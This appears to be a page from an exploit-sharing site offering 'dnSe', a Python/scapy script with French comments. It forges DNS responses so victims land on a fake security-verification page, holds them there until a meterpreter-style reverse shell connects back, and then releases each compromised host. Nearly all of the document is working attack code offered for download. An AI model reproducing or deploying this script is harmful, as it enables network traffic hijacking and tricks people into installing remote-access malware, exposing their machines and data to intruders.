dnSe :: DNS Spoofing + SE

Download | Vote Up (1) | Vote Down (0) 
# dnSe
# Author: St0rn
# Mail: bsoddigital@gmail.com
#
# Attaque combinant du DNS Spoofing avec une fausse page demandant 
# une verification de securite (SE), la page reste bloque sur la
# "Page de Verification" tant que la connexion (meterpreter ou autre)
# n est pas etablit, une fois qu'elle l est, l hote en question est
# sorti du dns spoofing.
#
# argv[1] = Port du shell ; argv[2] = device
#
#!usr/bin/env/python

import os
import sys
import string
import thread
from scapy.all import *

######################### List ########################

file_list = []
black_list = []
domain = []
domain_type = []
spoof_ip = []

################## Read file Function #################

def read_file():
 try:   
  file = open('dns.spoof', 'r')
  while 1:
   line = file.readline()
   if line == "":
     break
   if line[0] != '#':
     file_list.append(line)
  file.close()
  for i in range(len(file_list)):
     split = file_list[i].split(" ")
     domain.append(split[0])
     domain_type.append(split[1])
     spoof_ip.append(split[2].replace("\n",""))  
 except:
  print "\n\033[91mCan't open Domain File\033[0m"
  sys.exit()
 


################# DNS Spoofing Attack ###################

def attack(p):
 if p.haslayer(IP) and p.haslayer(TCP):
    if p[TCP].dport == int(sys.argv[1]) and p[IP].src not in black_list:
       black_list.append(p[IP].src)
       print "\n\033[92m Session Detected\033[0m"
 if p.haslayer(UDP) and p.haslayer(DNS) and not p.haslayer(DNSRR):
  l = len(p[DNS][DNSQR].qname)
  if p[DNS][DNSQR][0:l-1].qname[0:l-1] in domain:
    if p[IP].src not in black_list:
      ether = Ether(dst = p[Ether].src, src = p[Ether].dst)
      ip = IP(dst = p[IP].src, src = p[IP].dst)
      udp = UDP(sport = p[UDP].dport, dport = p[UDP].sport)
      dns = DNS(id = p[DNS].id, qr = 1, opcode = 16, aa = 0, tc = 0, rd = 0, ra = 1, z = 8, rcode = 0, qdcount = 1, ancount = 1, nscount = 0, arcount = 0, qd = p[DNS].qd)
      nb = domain.index(p[DNS][DNSQR].qname[0:l-1])
      dns.an = DNSRR(rrname = p[DNS][DNSQR].qname[0:l-1], type = domain_type[nb], rclass = "IN", ttl = 1337, rdata = spoof_ip[nb])
      payload = ether/ip/udp/dns
      sendp(payload, verbose = 0, iface_hint = p[IP].src)
      print "\n\033[94m " + p[DNS][DNSQR].qname[0:l-1] + " answer by " + p[IP].src + " spoof to " + spoof_ip[nb] + "\033[0m"

######################### Main ###########################

os.system("clear")
if len(sys.argv) < 3:
 print "\nUsage: dnSe.py <Listen port> <interface>\n"
else: 
 read_file()
 try:
  sniff(prn = attack, iface = sys.argv[2])
 except:
  print "\n\033[91mCan't launch Attack sniffer :'(\033[0m"
  sys.exit()

###########################
#dns.spoof:
#
#Le fichier doit être conçut comme cela:
#Domain Type Spoof_IP
#Bien respecter l'écart d'un espace entre les
#arguments
#Le fichier peut être commenté avec #
#

St0rn

Be the first to give feedback !
Please login to comment !